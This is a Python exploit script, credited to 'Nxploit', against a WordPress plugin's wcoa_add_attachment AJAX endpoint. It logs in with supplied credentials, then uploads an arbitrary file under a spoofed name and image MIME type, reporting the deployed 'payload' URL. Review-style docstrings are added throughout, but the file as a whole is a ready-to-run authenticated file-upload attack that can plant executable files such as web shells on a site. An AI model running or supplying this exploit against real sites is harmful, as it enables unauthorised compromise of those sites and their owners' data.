import requests
import argparse
import json
import os
# exploit by | Nxploit | Khaled alenazi
# Silences urllib3's warnings, including the one it emits for unverified HTTPS
# requests. Every request in this file passes verify=False, so the server
# certificate is never validated and the login credentials are sent to an
# unauthenticated peer.
requests.packages.urllib3.disable_warnings()
# Fixed, browser-like User-Agent attached to every request. The value is
# constant, so it shows up unchanged wherever the server logs this header.
USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
def authenticate(session, url, username, password):
    """Log in to WordPress through wp-login.php using *session*.

    Posts the standard login form to ``url + "/wp-login.php"``. The login is
    considered successful when the session's cookie jar afterwards holds any
    cookie whose name contains ``wordpress_logged_in``; the HTTP response
    itself is not inspected.

    Returns:
        True when such a cookie is present, False otherwise.

    Certificate verification is disabled (``verify=False``) and no timeout is
    passed, so the credentials go to an unverified server and the call can
    block for as long as the server keeps the connection open.
    """
    form_fields = {
        "log": username,
        "pwd": password,
        "rememberme": "forever",
        "wp-submit": "Log In",
    }
    endpoint = url + "/wp-login.php"

    print("[*] Initiating authentication...")
    session.post(
        endpoint,
        data=form_fields,
        verify=False,
        headers={"User-Agent": USER_AGENT},
    )

    # Success is judged purely from the cookie jar, not from the status code.
    for cookie in session.cookies:
        if "wordpress_logged_in" in cookie.name:
            print("[✔] Authentication successful.")
            return True

    print("[✘] Authentication failed.")
    return False
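def validate_file(file_path):
    """Abort the program unless *file_path* names an existing regular file.

    Prints an error and exits with status 1 when the path is missing or is
    not a regular file (for example a directory, which a later
    ``open(file_path, "rb")`` could not read). Returns None otherwise.

    Raises:
        SystemExit: with code 1 if the path is not an existing regular file.
    """
    if not os.path.isfile(file_path):
        print(f"[✘] Error: File '{file_path}' not found!")
        # Raise SystemExit directly: the ``exit`` helper is injected by the
        # ``site`` module (absent under ``python -S``), and calling it with
        # no argument reports success (status 0) for what is an error.
        raise SystemExit(1)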
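def execute_payload(session, url, order_id, file_path, filetype):
    """Send *file_path* to the ``wcoa_add_attachment`` AJAX action.

    Issues a multipart POST to ``url + "/wp-admin/admin-ajax.php"`` with the
    form fields ``action=wcoa_add_attachment`` and ``order_id``, plus one file
    part named ``attachment``. The part's file name (*file_path* exactly as
    given) and its content type (*filetype*) are supplied by the caller and
    are not derived from the file's contents, so a receiving handler cannot
    rely on either value to decide what kind of file it was given.

    Args:
        session: logged-in HTTP session used to send the request.
        url: base URL of the site; the AJAX path is appended to it.
        order_id: value sent in the ``order_id`` form field.
        file_path: local file to read; also sent as the part's file name.
        filetype: value sent as the part's content type.

    Returns:
        The response object returned by ``session.post``.

    Certificate verification is disabled (``verify=False``) and no timeout
    is passed.
    """
    upload_url = url + "/wp-admin/admin-ajax.php"
    # The context manager closes the file handle once the request has been
    # sent; the original left it open for the life of the process.
    with open(file_path, "rb") as attachment:
        files = {
            "attachment": (file_path, attachment, filetype)
        }
        data = {
            "action": "wcoa_add_attachment",
            "order_id": order_id
        }
        print(f"[*] Deploying payload: {file_path} to order {order_id}...")
        return session.post(
            upload_url,
            files=files,
            data=data,
            verify=False,
            headers={"User-Agent": USER_AGENT},
        )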
def analyze_response(response):
    """Print the outcome of the upload request; returns None.

    A non-200 status is reported as a failure together with the status code.
    For a 200 response the body is parsed as JSON: ``status == "success"``
    prints the success message followed by ``data.url`` (or ``Unknown`` when
    the ``url`` key is absent); any other status value prints a failure
    message. A body that is not valid JSON is reported as a parse failure.

    NOTE(review): a success body without a "data" key raises KeyError on the
    lookup below; only json.JSONDecodeError is caught here.
    """
    if response.status_code != 200:
        print(f"[✘] Deployment failed! HTTP Status: {response.status_code}")
        return

    try:
        body = response.json()
        if body.get("status") != "success":
            print("[✘] Deployment failed.")
            return
        location = body["data"].get("url", "Unknown")
        print("[✔] Payload successfully deployed!")
        print(f"🔗 File URL: {location}")
    except json.JSONDecodeError:
        print("[✘] Failed to parse JSON response.")
def main():
    """Command-line entry point: parse options, log in, upload, report.

    Steps, in order: parse the arguments, create one HTTP session, log in
    with the supplied credentials (exiting if that fails), check that the
    local file exists, send it to the ``wcoa_add_attachment`` action and
    print the interpreted result.
    """
    cli = argparse.ArgumentParser(description="WordPress File Upload via wcoa_add_attachment")

    # Mandatory options share the same keyword arguments, so declare them
    # from a table; declaration order is kept because it drives --help output.
    mandatory = (
        (("-u", "--url"), "Target WordPress site URL (e.g., http://example.com/wordpress4)"),
        (("-un", "--username"), "WordPress username"),
        (("-p", "--password"), "WordPress password"),
    )
    for flags, description in mandatory:
        cli.add_argument(*flags, required=True, help=description)

    cli.add_argument(
        "-o", "--order",
        default="196",
        help="Order ID to attach the file (default: 196)",
    )
    cli.add_argument(
        "--filename",
        default="Nxploit.jpg",
        help="File name to upload (default: Nxploit.jpg)",
    )
    cli.add_argument(
        "--filetype",
        default="image/jpeg",
        help="MIME type of the file (default: image/jpeg)",
    )
    opts = cli.parse_args()

    # One session carries the login cookies over to the upload request.
    http = requests.Session()
    logged_in = authenticate(http, opts.url, opts.username, opts.password)
    if not logged_in:
        exit()

    validate_file(opts.filename)
    analyze_response(
        execute_payload(http, opts.url, opts.order, opts.filename, opts.filetype)
    )


# Run the command-line flow only when executed as a script, not on import.
if __name__ == "__main__":
    main()